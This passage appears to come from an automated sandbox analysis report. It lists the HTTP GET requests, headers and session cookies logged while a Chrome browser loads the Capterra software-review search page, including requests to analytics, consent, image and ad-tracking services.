_ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /js/device.js HTTP/1.1Host: device.maxmind.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-00000000000000004d2acae53063d6d1-3d3a0effed00c966-01sec-ch-ua-mobile: ?0x-gdm-source-site: Capterrax-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1Accept: application/json, text/plain, */*x-datadog-trace-id: 5560479775650469585x-datadog-parent-id: 4411855277318523238sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /static/logos/capterra-logo.svg HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/pages/products-search-269c80371465c95a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /fsrelay/s/fs.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://reviews.capterra.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/847-853074d4dea368fa.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /_next/static/rlbEn55nmth45KPaQkAHZ/_ssgManifest.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /web-vitals/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/v1/categories/targets?lang=en HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /js/device.js HTTP/1.1Host: device.maxmind.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://reviews.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/5179d6b3-aa3f-403b-8cb4-718850815472.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e1b492c5-8a97-4b86-a422-d317b2480afa.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/b0bf7e60-e572-4090-8dd8-0e950b0ad16d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /td/rul/1072635088?random=1725034620739&cv=11&fst=1725034620739&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /activityi;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
